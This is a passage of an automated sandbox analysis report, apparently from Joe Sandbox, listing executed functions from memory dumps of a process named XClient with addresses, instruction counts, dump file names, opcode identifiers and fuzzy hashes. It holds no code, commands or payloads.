                                                              • Opcode ID: 061c218e8f2c0040ea66100c361d515785f2d763aa5690e4df8b4915eb071013
                                                              • Instruction ID: b5687be65101c5dd160e3f66a54459500cc2352a475f5ace6451a8d94cdbdea5
                                                              • Opcode Fuzzy Hash: 061c218e8f2c0040ea66100c361d515785f2d763aa5690e4df8b4915eb071013
                                                              • Instruction Fuzzy Hash: 38F0E9F2D093459FCB119BB4DD0529D7FF0AF56201F0A04BBC485D7252F6384A20CB92
                                                              Function 016D0F9D Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2347418027.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_16d0000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9640de14280829358d9ac2d2883eed59f861975e0ffcff4ae05bbafb50806943
                                                              • Instruction ID: a1cf0b545c2285ad62ed679d4c7f1ba368c6a2f4362178927f4e17a320f409ac
                                                              • Opcode Fuzzy Hash: 9640de14280829358d9ac2d2883eed59f861975e0ffcff4ae05bbafb50806943
                                                              • Instruction Fuzzy Hash: 17F01C74A04306DFDB24DB78CE58B9D7BB0AB49705F250968D402A73A0DBB48884CB50
                                                              Function 016D1AE0 Relevance: .0, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2347418027.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_16d0000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ac93aebab49f8fc82d08efcfd0e6f7bade8baf3a7fa5d6fe52b3258f744a52e5
                                                              • Instruction ID: 4e1914de511dfd781816a408a6f1421416be76865ac0605984d8bf487a2326aa
                                                              • Opcode Fuzzy Hash: ac93aebab49f8fc82d08efcfd0e6f7bade8baf3a7fa5d6fe52b3258f744a52e5
                                                              • Instruction Fuzzy Hash: E9D012357102149BC710EA69ED49A453B78EB09611F5141A5EA08DB250EB71DC14CBD1
                                                              Function 016D08A8 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2347418027.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_16d0000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 68bc1ee1c7fa4d51d3bfb65f1cab709e87d9c2bcb9a1fd5b5711591713096130
                                                              • Instruction ID: ab3f33675499581cd113ec4521466a883c56db6919879d028dcfa20bfc5ba6b5
                                                              • Opcode Fuzzy Hash: 68bc1ee1c7fa4d51d3bfb65f1cab709e87d9c2bcb9a1fd5b5711591713096130
                                                              • Instruction Fuzzy Hash: 90D017B1D01219AF8F40EFB89D092DEBBF8EE08250F000566D909E3200E6704A108BE1

                                                              Executed Functions

                                                              Function 01390BC0 Relevance: .3, Instructions: 338COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2425712189.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_1390000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4c8758235111146573a6d289427bab020a91ce976dc721a1c879532e9d60c813
                                                              • Instruction ID: 7084cc933d3524782dde7f6aec13b2e10e2d2af269ebb43cf4c7c3950ff24219
                                                              • Opcode Fuzzy Hash: 4c8758235111146573a6d289427bab020a91ce976dc721a1c879532e9d60c813
                                                              • Instruction Fuzzy Hash: 5A81D275A00705CFDF29AF78D45869EBBB6EF89304F048569E406A7264DF34AC95CB40
                                                              Function 01391230 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2425712189.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_1390000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tPjq
                                                              • API String ID: 0-297075936
                                                              • Opcode ID: 6939615b33038534c75f7a894dd08fb528845c7fcbf7dc7aba68828c336d2447
                                                              • Instruction ID: 3ca55a0fd1dcb9dbe155557cb5b0793e2f58fb179a3b26a1cc10782930109a39
                                                              • Opcode Fuzzy Hash: 6939615b33038534c75f7a894dd08fb528845c7fcbf7dc7aba68828c336d2447
                                                              • Instruction Fuzzy Hash: B93148347416518FCB5AAB38C59881D7BF2AF8A61535508B9E802CF3B6DA35DC42CB81
                                                              Function 01391240 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2425712189.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_1390000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tPjq
                                                              • API String ID: 0-297075936
                                                              • Opcode ID: c5855916ed6f65a339e092ce0a54b93ebd2d7ce8be5f0bc1849bcb047dac8e12
                                                              • Instruction ID: ab69228f2dda320b539962cb56bf4e14b8375d22a7f7560ab9394be42b0452da
                                                              • Opcode Fuzzy Hash: c5855916ed6f65a339e092ce0a54b93ebd2d7ce8be5f0bc1849bcb047dac8e12
                                                              • Instruction Fuzzy Hash: 362105357406118FCB59AB39C59881D7BF6EF8962636508B8E906CF375DA36EC42CB80
                                                              Function 01391AE0 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2425712189.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_1390000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8nq
                                                              • API String ID: 0-2810462305
                                                              • Opcode ID: e2e87ceed5365bef41b7bad6f6998b4556c5d4e8bef0972742e607dafda7a410
                                                              • Instruction ID: 120b904f3816352613b7cbcbdeb972614fd49ee7d0108142e885bfaaa2796488
                                                              • Opcode Fuzzy Hash: e2e87ceed5365bef41b7bad6f6998b4556c5d4e8bef0972742e607dafda7a410
                                                              • Instruction Fuzzy Hash: B5118135E002049FC744EF78E591AAE7BEAFF85304F1040A9C509AB395DE389D16CB95
                                                              Function 01391340 Relevance: .5, Instructions: 526COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2425712189.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_1390000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4af18144ad7af2dd86b3b1942354b36e8ea76b8a57659a73f3487b81cf0c7787
                                                              • Instruction ID: 5cecac944d52ab41fca762a2623ae7d356ccebdffe81270482f2718cf2217959
                                                              • Opcode Fuzzy Hash: 4af18144ad7af2dd86b3b1942354b36e8ea76b8a57659a73f3487b81cf0c7787
                                                              • Instruction Fuzzy Hash: 4B225B74B04602CFDB24DF38D59062A77B6FB8A319B10897CD456AB399DB39EC41CB81
                                                              Function 01391C00 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2425712189.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_1390000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1b47ac60a6365efe9ef2c681b3331b86109950d841497c1a1e52a4b033bcd402
                                                              • Instruction ID: bb39fa09c9ddf2c4bdf6b4fc95fa625c8e4796dcf041af591f8d57cd6a42e13d
                                                              • Opcode Fuzzy Hash: 1b47ac60a6365efe9ef2c681b3331b86109950d841497c1a1e52a4b033bcd402
                                                              • Instruction Fuzzy Hash: 7A118E76E042459FCB51DFB8D9408AEBBF1FF8A20071181BAE505E7222E7389915CB90
                                                              Function 01391C10 Relevance: .0, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2425712189.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_1390000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7763094478ab4ab3badc00f69df3c81047840c68e95028111f599c601a645d22
                                                              • Instruction ID: 22cc3dba162fe8ab730f83c96d3de55dbf2e5bdd32c167f98eead57a766e3595
                                                              • Opcode Fuzzy Hash: 7763094478ab4ab3badc00f69df3c81047840c68e95028111f599c601a645d22
                                                              • Instruction Fuzzy Hash: C7015276E002069FCB44DFB8D94489BFBF5FF89210710817AE519A7220E774A915CB90
                                                              Function 01390F9D Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2425712189.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_1390000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 57cad824a6b8ee9de885ed489de20afb987132678a4f93dbd976779c95ab599e
                                                              • Instruction ID: 295d814529a7942400c42046aed39c3b576b3ab2dd5c0463d8a540c3ed11634d
                                                              • Opcode Fuzzy Hash: 57cad824a6b8ee9de885ed489de20afb987132678a4f93dbd976779c95ab599e
                                                              • Instruction Fuzzy Hash: 06F01CB5A44306DFDF24DBB8C15979D7BB4AB08718F140869D402A7360DBB49884CB50
                                                              Function 01390898 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2425712189.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_1390000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6da7ee03a96bb985ebdc6b53df48b0495dd0d6dbc29bf55d57a7e1ef35fd8577
                                                              • Instruction ID: 971d62f64214adaa4b5d8ce9b54c5a32bfe8565b4b2c26895c21a0aa8305e569
                                                              • Opcode Fuzzy Hash: 6da7ee03a96bb985ebdc6b53df48b0495dd0d6dbc29bf55d57a7e1ef35fd8577
                                                              • Instruction Fuzzy Hash: BEE09272D0A358AFCFA1DBB855052EEBFF4AE06200B0545FFC44EE7106E2704A09CB82
                                                              Function 013908A8 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2425712189.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_1390000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 92e4584cffabcd45dce446b0ac0b6c91d4009b6e4866d6769203a3f352726f98
                                                              • Instruction ID: 9898bc832e63efd00a8f2544c5ff95569921a2b71ecf57bb771a9b6283581b66
                                                              • Opcode Fuzzy Hash: 92e4584cffabcd45dce446b0ac0b6c91d4009b6e4866d6769203a3f352726f98
                                                              • Instruction Fuzzy Hash: 8DD042B6D05219AF8B50EBB9990519EBBF8AA09250B104566D919E7204E6705A108BD1

                                                              Executed Functions

                                                              Function 01361230 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000016.00000002.2670662803.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_22_2_1360000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tPjq
                                                              • API String ID: 0-297075936
                                                              • Opcode ID: 93c0725011754a126a86792713558573f11ae570e6f2d07d3979c7a90f0cb43a
                                                              • Instruction ID: 5f05256fab2f9ad0ae80a62f2fe9db18c0fc031223b6a721906899aad9887e36
                                                              • Opcode Fuzzy Hash: 93c0725011754a126a86792713558573f11ae570e6f2d07d3979c7a90f0cb43a
                                                              • Instruction Fuzzy Hash: C23137343406108FCB59AB39C59881D7BF6EF8A62536504B9E502CF3B5DA3AEC42CB80
                                                              Function 01361240 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000016.00000002.2670662803.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_22_2_1360000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tPjq
                                                              • API String ID: 0-297075936
                                                              • Opcode ID: 411aa1b9aa5ce701b6812b9e3c3071b2f48c725572bb9fec05b28e54970db20a
                                                              • Instruction ID: 791a063735e6fae43672b6a0de3542203cbd413ed9c28266a14d7669e58aac47
                                                              • Opcode Fuzzy Hash: 411aa1b9aa5ce701b6812b9e3c3071b2f48c725572bb9fec05b28e54970db20a
                                                              • Instruction Fuzzy Hash: B42103347406108FCB59AB39C59881D7BE6EF8961636508B8E906CF3B5DA36EC42CB80
                                                              Function 01361AE0 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000016.00000002.2670662803.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_22_2_1360000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8nq
                                                              • API String ID: 0-2810462305
                                                              • Opcode ID: 6e3c863600e9dd5e2abd5eaf7d6b22cf1e4d852bc9759ff75d9791bb36873814
                                                              • Instruction ID: 309b3e71531fc7a3797b604058601513e50cfbc357d57ca29cf864a5ee7e34f9
                                                              • Opcode Fuzzy Hash: 6e3c863600e9dd5e2abd5eaf7d6b22cf1e4d852bc9759ff75d9791bb36873814
                                                              • Instruction Fuzzy Hash: 01118431B003089FC758EF78E5946EE7BAAFF95611F1080A9C505AB394DF389D06CB95
                                                              Function 01361340 Relevance: .5, Instructions: 525COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000016.00000002.2670662803.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_22_2_1360000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8eb30722a36c5175cf64f45e4473d103776f37d160dcf249b88ea15d8bc18471
                                                              • Instruction ID: 1ed22e11e9b71c4477a0f9fa57b874885cdcc63293aa7384e0390e463638acd3
                                                              • Opcode Fuzzy Hash: 8eb30722a36c5175cf64f45e4473d103776f37d160dcf249b88ea15d8bc18471
                                                              • Instruction Fuzzy Hash: 2B224C30704206CFDB58DF38D59066A7BBAFBC8205B10897DD5569B399DB39EC81CB41
                                                              Function 01360BC0 Relevance: .3, Instructions: 338COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000016.00000002.2670662803.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_22_2_1360000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7e8362e1a490a7ab65d3baba4da574891e17b1efe2435a5b6e6bbafd24d8a9c6
                                                              • Instruction ID: 60c109f37bdab9a528cf73608f1f3a6eb1ce233cd029467c703a5e52012764bd
                                                              • Opcode Fuzzy Hash: 7e8362e1a490a7ab65d3baba4da574891e17b1efe2435a5b6e6bbafd24d8a9c6
                                                              • Instruction Fuzzy Hash: EB81E331A04305CFDB299F74C45869EBFBAEF88300F14C569E41667768DB78AC85CB80
                                                              Function 01361C00 Relevance: .1, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000016.00000002.2670662803.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_22_2_1360000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d21a80438aeffc1a904434cf204dff6988f97431c28ca79686d27d88a97d8fac
                                                              • Instruction ID: efb2a0cfdf4ae837fea6a355ee94ad056ad182fee050fbe8c5b53e4156a0af7a
                                                              • Opcode Fuzzy Hash: d21a80438aeffc1a904434cf204dff6988f97431c28ca79686d27d88a97d8fac
                                                              • Instruction Fuzzy Hash: FE11A176E002059FCB40DFB8D8808DEFBF5FF8921071181BAE515EB221E775A915CB90
                                                              Function 01361C10 Relevance: .0, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000016.00000002.2670662803.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_22_2_1360000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 839bb3473ab8e220ff75adde51292bd5effd7bb52122652e6ee2e201c3ac7fff
                                                              • Instruction ID: 9d90d14a5185294064f65873e6e38008686a0cfcb54890c66995cdb59cb2f885
                                                              • Opcode Fuzzy Hash: 839bb3473ab8e220ff75adde51292bd5effd7bb52122652e6ee2e201c3ac7fff
                                                              • Instruction Fuzzy Hash: 29015275E002059FCB44DFB8D94489FFBF5FF89210710816AE519A7220E774A915CB90
                                                              Function 01360880 Relevance: .0, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000016.00000002.2670662803.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_22_2_1360000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0343c01a24f225cef5c3c07a8d0187255b15062ea0e60cd5d7d39ff32d60f649
                                                              • Instruction ID: 8d1c34ddd1b4dbc3bab033902680130ebdedad7f6861e690d63938ea8e51049e
                                                              • Opcode Fuzzy Hash: 0343c01a24f225cef5c3c07a8d0187255b15062ea0e60cd5d7d39ff32d60f649
                                                              • Instruction Fuzzy Hash: 92F04F71B093559FC7429BB8E8210CD7FF4EE86224B0604BBD4C4D7552E2780D55CBA2
                                                              Function 01360F9D Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000016.00000002.2670662803.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_22_2_1360000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7f8f0b6d06c202887d3f89c61b6599805f98f8fff12c18b168390e26bc2ec315
                                                              • Instruction ID: 65cab9b0b8fbb82d850d2f36d1463414ee58a6e715ee1f0b63d13de121fd0f99
                                                              • Opcode Fuzzy Hash: 7f8f0b6d06c202887d3f89c61b6599805f98f8fff12c18b168390e26bc2ec315
                                                              • Instruction Fuzzy Hash: 5DF03074904315CFDB28DB78C1597AD7FF4AF48708F254868D402AB364DBB88C84CB50
                                                              Function 013608A8 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000016.00000002.2670662803.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_22_2_1360000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 11682d74b5ca45c7463d42637fa847b542a3f826416f6992c78eac858794379a
                                                              • Instruction ID: dd6b473a6855064b0dba7210d5b7c493e4b826bbfcfd630fcf907bcccecd93b4
                                                              • Opcode Fuzzy Hash: 11682d74b5ca45c7463d42637fa847b542a3f826416f6992c78eac858794379a
                                                              • Instruction Fuzzy Hash: 56D017B1D0522DAF8B40EFB899051DEBFF8EE08250B004576D919E3204E2704A108BD1

                                                              Executed Functions

                                                              Function 02E51230 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000018.00000002.3265624767.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_2e50000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tPjq
                                                              • API String ID: 0-297075936
                                                              • Opcode ID: 4ed9de4bc788c0225ec36da4619cc76b83d4a364719f05c65cc292196e528262
                                                              • Instruction ID: 735111a66e4a188655799e2d086ab745108897102c1a81f3795b7da722ebe757
                                                              • Opcode Fuzzy Hash: 4ed9de4bc788c0225ec36da4619cc76b83d4a364719f05c65cc292196e528262
                                                              • Instruction Fuzzy Hash: 793159347406208FCB59AB38C59882D3BF2BF8A71536508B9E806CF371DA35DC42CB81
                                                              Function 02E51240 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000018.00000002.3265624767.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_2e50000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: tPjq
                                                              • API String ID: 0-297075936
                                                              • Opcode ID: e8ff50bc6d8d76c56abdaf91d0e79a97b83bc2cac0f2de89cd0f35a255cfee73
                                                              • Instruction ID: 0802d4c07dfbe07eefe9e2845b60eefffa7122650cc63025788dc6c8732fb18b
                                                              • Opcode Fuzzy Hash: e8ff50bc6d8d76c56abdaf91d0e79a97b83bc2cac0f2de89cd0f35a255cfee73
                                                              • Instruction Fuzzy Hash: 8E2125343406208FCB59AB39C59891D3BE6FF8961536508B8E906CF375DA36EC42CB80
                                                              Function 02E51AE0 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000018.00000002.3265624767.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_2e50000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8nq
                                                              • API String ID: 0-2810462305
                                                              • Opcode ID: 32ba3955043f479b4b8019ff25e9456762783b4c9517b903c753dba7ddd71279
                                                              • Instruction ID: 9bda0410625152f7233ccada88f61457d06d9627851bff6a20d9ed5751e7e7d6
                                                              • Opcode Fuzzy Hash: 32ba3955043f479b4b8019ff25e9456762783b4c9517b903c753dba7ddd71279
                                                              • Instruction Fuzzy Hash: 76119374A40218AFC754EF78A4A4BEE7BFABF85304F1040A9C5099B394EE359D06CB95
                                                              Function 02E51340 Relevance: .5, Instructions: 515COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000018.00000002.3265624767.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_2e50000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: afbf986bda8cbef2e07c7ee0549653d4fcede2043ceb4e1754498e2db7913e30
                                                              • Instruction ID: 560a299545100b9fe256e727444678b650562fe2aff628cb69e316c66e24396f
                                                              • Opcode Fuzzy Hash: afbf986bda8cbef2e07c7ee0549653d4fcede2043ceb4e1754498e2db7913e30
                                                              • Instruction Fuzzy Hash: CA225C74754216CFDB24EF34D5A0B6A77B6BB88304F149929D80A8B399EB35EC42CB50
                                                              Function 02E50BC0 Relevance: .3, Instructions: 338COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000018.00000002.3265624767.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_2e50000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 71d31d0448a41acba2e3b0191d003819f908adc03d66abf04546a98112eecc62
                                                              • Instruction ID: 30a181364debae10fa461bafc7c3955db04a319ab43963be606d825ceae215cd
                                                              • Opcode Fuzzy Hash: 71d31d0448a41acba2e3b0191d003819f908adc03d66abf04546a98112eecc62
                                                              • Instruction Fuzzy Hash: 7781E275A40315CFCB25AF74D4686AABBF6EF88304F14C569E806A7368DF35AC85CB40
                                                              Function 02E51C00 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000018.00000002.3265624767.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_2e50000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 01f0249e2f230d8865d5f5c32f1397bf45b14f20c05e36fd51a083d35407b879
                                                              • Instruction ID: 6afb076205ee1d67d69035fecfd5d42688e51e9bdbc349f9cffd36454adaa5ab
                                                              • Opcode Fuzzy Hash: 01f0249e2f230d8865d5f5c32f1397bf45b14f20c05e36fd51a083d35407b879
                                                              • Instruction Fuzzy Hash: 1B11C275E002469FCB41EFB4D8808EEFBF1FF89200714866AE405D7221E7709815CB90
                                                              Function 02E51C10 Relevance: .0, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000018.00000002.3265624767.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_2e50000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b02513c14710fb5d0b4c241f64af69670032d04ce32cf134430b0abf56a894f2
                                                              • Instruction ID: 1387b91aed55ac73993f4d61971317fbd1bebedd8f9115f410fab41e588bfc98
                                                              • Opcode Fuzzy Hash: b02513c14710fb5d0b4c241f64af69670032d04ce32cf134430b0abf56a894f2
                                                              • Instruction Fuzzy Hash: F5019275E002099FCB40EFB8D88489FFBF5FF88300710866AE51997224E730A911CBA0
                                                              Function 02E50898 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000018.00000002.3265624767.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_2e50000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aeebd042cd62b94ea6cd3563032d8014a5f4b15aa7acd566682c10bc2e918e0c
                                                              • Instruction ID: 54bac11fe86f68ab419ab8bd6dce86314dab35b7087d56d8494f5d361e2cba4b
                                                              • Opcode Fuzzy Hash: aeebd042cd62b94ea6cd3563032d8014a5f4b15aa7acd566682c10bc2e918e0c
                                                              • Instruction Fuzzy Hash: 60E01271C55399AF8B50DFB865061EEBBF4AE09210B10857AD94AE3101F3745619CF81
                                                              Function 02E50F9D Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000018.00000002.3265624767.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_2e50000_XClient.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
